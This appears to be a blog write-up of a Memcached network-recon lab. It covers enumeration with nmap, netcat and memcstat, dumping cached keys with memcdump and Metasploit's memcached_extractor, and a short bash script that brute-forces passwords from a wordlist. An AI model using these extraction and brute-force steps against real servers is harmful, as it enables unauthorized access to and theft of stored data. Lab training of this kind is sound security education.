Memcached - Network Recon

This post describes key learnings while solving Memcached under Network Recon challenges on attackdefense.com

Note : The contents of the post are helpful in solving the challenges, and not a complete step by step solution

. . .

Introduction

What is Memcached?

Memcached is an in-memory key-value store for small chunks of arbitrary data (strings, objects) from results of database calls, API calls, or page rendering.
Essentially speaking, it is an object caching system, that is intended to speed up dynamic web applications by balancing the load on the database.

. . .

Tools

We can download tools dedicated to interact with memcached using the following command

apt-get install libmemcached-tools

After installing the tools, we see a list of utilities that are now available in our arsenal to interact with Memcached.

Memcached Tool Utility Functions
List of utilities available
. . .

Enumeration

Memcached is usually hosted on the port 11211.
If not, we can always scan all the ports on the target :)

Version Enumeration

Nmap

We can use the -sV to enumerate the service version

version information

If we want more information we can even use NSE Scripts, searching the directory `/usr/share/nmap/scripts` for ‘memcached’ results in a single script ‘memcached-info.nse’, using which we get additional information about the hosted service.

memcached recon using nmap nse scripts
memcached recon using nmap nse scripts

Notice that we see that the service does not need any authentication. ( This is why we do recon, to find easy targets :P )

Using netcat and telnet

We can use netcat and telnet to enumerate the version as well.

nc -v $target 11211
version
using netcat and telnet for version enumeration
using netcat and telnet for version enumeration

Service Enumeration

We can use memcstat to gather more information about the server

memcstat --server=<ip_address>
service enumeration
This is a snippet, the actual output is a lot bigger and tells more information about the hosted service

Note: Memcached uses authentication, but can allow unauthenticated access as well. It might also come useful to know during Pentests that Memcached uses SASL authentication.

Authenticated Access

For authenticated access, we can append username and password to all memc* tools.

memcstat --server=<ip_adderss> --username=<username> --password=<password>
. . .

Dumping Data

Using memcdump

We can get a dump of all keys using memcdumpafter which we can use memccat to get data stored in keys.

dumping data
dumping data using memcdump

Using Metasploit

root@attackdefense:~# msfconsole 
msf5 > use auxiliary/gather/memcached_extractor 
msf5 auxiliary(gather/memcached_extractor) > set RHOSTS 192.207.161.3 
msf5 auxiliary(gather/memcached_extractor) > exploit
dumping data using metasploit
dumping data using metasploit
. . .

Bruteforcing

As we saw above, that Memcached often uses authentication, and we can try brute-forcing and hope we get lucky :P
Thankfully, there was a brute-forcing script that was shared with lab access.

Source Code: 

#! /bin/bash
while read F ; do
echo "Trying $F"
    if memcstat --servers=$1 --username=$2 --password=$F | grep -q Server ; then
    echo "Password Found: "$F
    break
fi
done < $3

Which can be run using ./script $target $username <wordlist>

. . .

Final Note

So this is what I have to share with respect to Memcached, I welcome all comments and improvements that are necessary.